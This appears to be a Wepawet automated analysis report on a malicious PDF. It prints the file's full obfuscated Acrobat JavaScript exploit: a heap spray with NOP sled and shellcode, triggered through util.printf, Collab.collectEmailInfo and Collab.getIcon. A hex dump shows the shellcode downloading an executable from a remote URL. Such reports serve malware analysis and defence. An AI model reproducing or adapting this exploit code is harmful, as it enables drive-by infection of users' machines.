Wepawet

Analysis report for file 7b5811b3b63697b6c133c32550c3fbef

In particular, the following URL was found to contain malicious content:

• file://7b5811b3b63697b6c133c32550c3fbef/

Evals

• var tX1PnUHy = new Array();
  function lRUWC(E79yB, NPvAvQ){
    while (E79yB.length * 2 < NPvAvQ){
      E79yB += E79yB;
    }
    E79yB = E79yB.substring(0, NPvAvQ / 2);
    return E79yB;
  }
  function YVYohZTd(bBeUHg){
    var NTLv7BP = 0x0c0c0c0c;
    rpifVgf = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" + "
  %ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03
  %uefeb" + "
  %u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66
  %ub9e7" + "
  %uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87
  %u0a96" + "
  %u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa
  %uee85" + "
  %u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf
  %ucfaa" + "
  %u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a
  %uebaf" + "
  %u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34
  %u10bc" + "
  %ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6
  %uf7ba" + "
  %uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec
  %u0eec" + "
  %u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97
  %ub91c" + "
  %u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04
  %u11d4" + "
  %u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7
  %u1b07" + "
  %u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u622F%u6B69%u6170%u6F6B%u2E63%u6E63%u6E2F
  %u6375%u652F%u6578%u702E%u7068");
    if (bBeUHg == 1){
      NTLv7BP = 0x30303030;
    }
    var i388Ag8 = 0x400000;
    var JKn0PaC = rpifVgf.length * 2;
    var NPvAvQ = i388Ag8 - (JKn0PaC + 0x38);
    var E79yB = unescape("%u9090%u9090");
    E79yB = lRUWC(E79yB, NPvAvQ);
    var fwdFfLgn = (NTLv7BP - 0x400000) / i388Ag8;
    for (var HEUAQgED = 0; HEUAQgED < fwdFfLgn; HEUAQgED ++ ){
      tX1PnUHy[HEUAQgED] = E79yB + rpifVgf;
    }
  }
  function cIdIBAwE(){
    var dtqOgYaa = app.viewerVersion.toString();
    if (dtqOgYaa > 8){
      YVYohZTd(1);
      var BlrBfau = "12999999999999999999";
      for (BxeRRu = 0; BxeRRu < 276; BxeRRu ++ ){
        BlrBfau += "8";
      }
      util.printf("%45000f", BlrBfau);
    }
    if (dtqOgYaa < 8){
      YVYohZTd(0);
      var wfITJJ = unescape("%u0c0c%u0c0c");
      while (wfITJJ.length < 44952)wfITJJ += wfITJJ;
      this .collabStore = Collab.collectEmailInfo({
        subj : "", msg : wfITJJ
      }
      );
    }
    if (dtqOgYaa < 9.1){
      if (app.doc.Collab.getIcon){
        YVYohZTd(0);
        var M9bbAqU = unescape("%09");
        while (M9bbAqU.length < 0x4000)M9bbAqU += M9bbAqU;
        M9bbAqU = "N." + M9bbAqU;
        app.doc.Collab.getIcon(M9bbAqU);
      }
    }
  }
  cIdIBAwE();
  

  (repeated 1 time)

Writes

Requests

• AcrobatJavaScript
  	Name	Arg0	Arg1
  Methods	Collab.getIcon	4e 2e 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 other 16288 bytes 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
  	util.printf	%45000f	12999999999999999999888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888888888888888888888888888888888

43 43 43 43 eb 0f 5b 33  c9 66 b9 80 01 80 33 ef 
43 e2 fa eb 05 e8 ec ff  ff ff 7f 8b 4e df ef ef 
ef 64 af e3 64 9f f3 42  64 9f e7 6e 03 ef eb ef 
ef 64 03 b9 87 61 a1 e1  03 07 11 ef ef ef 66 aa 
eb b9 87 77 11 65 e1 07  1f ef ef ef 66 aa e7 b9 
87 ca 5f 10 2d 07 0d ef  ef ef 66 aa e3 b9 87 00 
21 0f 8f 07 3b ef ef ef  66 aa ff b9 87 2e 96 0a 
57 07 29 ef ef ef 66 aa  fb af 6f d7 2c 9a 15 66 
aa f7 06 e8 ee ef ef b1  66 9a cb 64 aa eb 85 ee 
b6 64 ba f7 b9 07 64 ef  ef ef bf 87 d9 f5 c0 9f 
07 78 ef ef ef 66 aa f3  64 2a 6c 2f bf 66 aa cf 
87 10 ef ef ef bf 64 aa  fb 85 ed b6 64 ba f7 07 
8e ef ef ef ec aa cf 28  ef b3 91 c1 8a 28 af eb 
97 8a ef ef 10 9a cf 64  aa e3 85 ee b6 64 ba f7 
07 af ef ef ef 85 e8 b7  ec aa cb dc 34 bc bc 10 
9a cf bf bc 64 aa f3 85  ea b6 64 ba f7 07 cc ef 
ef ef 85 ef 10 9a cf 64  aa e7 85 ed b6 64 ba f7 
07 ff ef ef ef 85 10 64  aa ff 85 ee b6 64 ba f7 
07 ef ef ef ef ae b4 bd  ec 0e ec 0e ec 0e ec 0e 
6c 03 eb b5 bc 64 35 0d  18 bd 10 0f ba 64 03 64 
92 e7 64 b2 e3 b9 64 9c  d3 64 9b f1 97 ec 1c b9 
64 99 cf ec 1c dc 26 a6  ae 42 ec 2c b9 dc 19 e0 
51 ff d5 1d 9b e7 2e 21  e2 ec 1d af 04 1e d4 11 
b1 9a 0a b5 64 04 64 b5  cb ec 32 89 64 e3 a4 64 
b5 f3 ec 32 64 eb 64 ec  2a b1 b2 2d e7 ef 07 1b 
11 10 10 ba bd a3 a2 a0  a1 ef 68 74 74 70 3a 2f 
2f 62 69 6b 70 61 6b 6f  63 2e 63 6e 2f 6e 75 63 
2f 65 78 65 2e 70 68 70 

CCCC..[3.f....3.
C...........N...
.d..d..Bd..n....
.d...a........f.
...w.e......f...
.._.-.....f.....
!...;...f.......
W.)...f...o.,..f
........f..d....
.d....d.........
.x...f..d*l/.f..
......d.....d...
.......(.....(..
.......d.....d..
............4...
....d.....d.....
.......d.....d..
.......d.....d..
................
l....d5......d.d
..d...d..d......
d.....&..B.,....
Q......!........
....d.d...2.d..d
...2d.d.*..-....
..........http:/
/bikpakoc.cn/nuc
/exe.php

This shellcode was found on file://7b5811b3b63697b6c133c32550c3fbef/.

Shellcode Analysis

Shellcode API Trace

Shellcode DLLs

Shellcode URLs

Additional (potential) malware: